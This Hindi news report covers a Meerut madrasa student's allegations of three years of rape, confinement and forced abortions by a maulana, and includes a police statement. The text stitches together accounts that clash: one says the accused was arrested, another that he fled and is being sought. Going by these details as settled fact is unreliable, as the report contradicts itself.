 उत्तर प्रदेश के मेरठ से हैवानियत का सनसनीखेज मामला सामने आया है। मदरसा छात्रा को मौलाना ने अपनी हैवानियत का शिकार बनाया। छात्रा के साथ वह तीन साल से दुराचार करता रहा। इस बीच छात्रा तीन बार प्रेग्नेंट हो गई। पत्नी के साथ मिलकर मौलाना ने छात्रा का गर्भपात कराया। बच्ची जब शिकायत करने लगी तो उसके बाल काट दिए। उसे पागल करार दे दिया। लोगों को उसकी बात पर भरोसा न करने के लिए मनाया। छात्रा ने जब घर लौटने की बात कही तो मामला बिगड़ गया। इसके बाद पूरे मामले का खुलासा हुआ है। पुलिस आरोपी मौलाना के खिलाफ केस दर्ज कर कार्रवाई में जुट गई है।

अब जानिए पूरा मामला

जानकारी मिली है कि यह पूरा मामला मेरठ के लोहिया नगर थाना क्षेत्र के एक मदरसे का है. यहां बिहार की रहने वाली 22 वर्षीय एक युवती ने पुलिस को शिकायत कर बताया कि 3 साल से एक मौलाना उसके साथ रेप कर रहा था. मौलाना की पत्नी भी उसका साथ देती थी. विरोध करने पर उसे पीटा जाता था. युवती का आरोप है कि उसको बंधक भी बनाया गया और जब वह गर्भवती हो गई तो उसका गर्भपात भी करा दिया गया था. पुलिस ने युवती की तहरीर पर मुकदमा दर्ज कर आरोपी मौलाना को गिरफ्तार कर लिया है.

पुलिस ने क्या बताया?

इस मामले में मेरठ के एसपी (सिटी) आयुष विक्रम सिंह ने बताया कि 'थाना लोहिया नगर पुलिस को एक युवती द्वारा तहरीर दी गई थी जिसमें एक मौलाना पर गंभीर आरोप लगाए गए थे. मामले की गंभीरता को देखते हुए पुलिस द्वारा तुरंत कार्रवाई करते हुए मौलाना को गिरफ्तार कर लिया गया है. महिला की तहरीर पर सुसंगत धाराओं में मुकदमा पंजीकृत किया गया है. महिला के बयान भी कराए गए हैं जिसमें उसने मौलाना पर गंभीर आरोप लगाए हैं. मौलाना से पूछताछ की जा रही है. मौलाना और युवती आपस में रिश्तेदार हैं, जो भी आरोप हैं, उनकी जांच की जा रही है. इसमें शुरुआती पूछताछ में अभी प्रेम प्रसंग का मामला सामने आ रहा है. जो भी तथ्य इसमें सामने आएंगे उसके अनुसार आवश्यक कार्रवाई की जाएगी.'

मेरठ जिले के लोहियानगर क्षेत्र स्थित एक मदरसे से इंसानियत को शर्मसार करने वाला मामला सामने आया है। बिहार से मौलवियत की पढ़ाई करने आई 22 वर्षीय छात्रा के साथ वहां के मौलाना ने तीन साल तक लगातार दुष्कर्म किया। पीड़िता ने थाने पहुंचकर पूरे मामले की शिकायत दर्ज कराई है। इसके बाद पुलिस ने आरोपी की तलाश शुरू कर दी है। वहीं, मौलाना की हैवानियत की दास्तां से हर कोई हैरान रह गया।

तीन बार करवाया गर्भपात
छात्रा का आरोप है कि मौलाना ने उसे कई बार बंधक बनाकर उसकी अस्मिता से खिलवाड़ किया। इस दौरान वह तीन बार गर्भवती हुई। लेकिन, मौलाना ने अपनी पत्नी की मदद से हर बार उसका गर्भपात करा दिया। पीड़िता का कहना है कि विरोध करने पर उसे मानसिक और शारीरिक रूप से प्रताड़ित किया गया।

छात्रा को बता दिया पागल
पीड़िता जब इस पीड़ा की जानकारी पड़ोसियों को देने की कोशिश करती, तो उसे पागल करार दे दिया जाता। इतना ही नहीं, उसे डराने और चुप कराने के लिए आरोपियों ने उसके बाल भी काट दिए। आखिरकार, जब छात्रा ने 9 जुलाई को ट्रेन से अपने घर लौटने का निर्णय लिया। टिकट बुक कराई तो मौलाना भड़क उठा और उसके खिलाफ हिंसक हो गया।

पड़ोसियों ने पुलिस को सूचना
गुरुवार को मौलाना ने छात्रा को एक बार फिर बंधक बना लिया और उसके साथ मारपीट कर दुष्कर्म किया। पीड़िता के चीखने-चिल्लाने पर पड़ोसी मौके पर पहुंचे। लड़की को मौलाना के चंगुल से आजाद कराया। इसके बाद पीड़िता पड़ोसियों के साथ थाने पहुंची। उसने पुलिस को घटना की जानकारी दी। मामला पुलिस में पहुंचने के बाद मौलाना फरार हो गया।

लोहियानगर थाना पुलिस ने तत्काल मामला दर्ज कर मौलाना की तलाश में जुट गई है। एसएचओ लोहिया नगर ने बताया कि पीड़िता के बयान दर्ज करने के बाद आगे की कार्रवाई की जाएगी।

]]>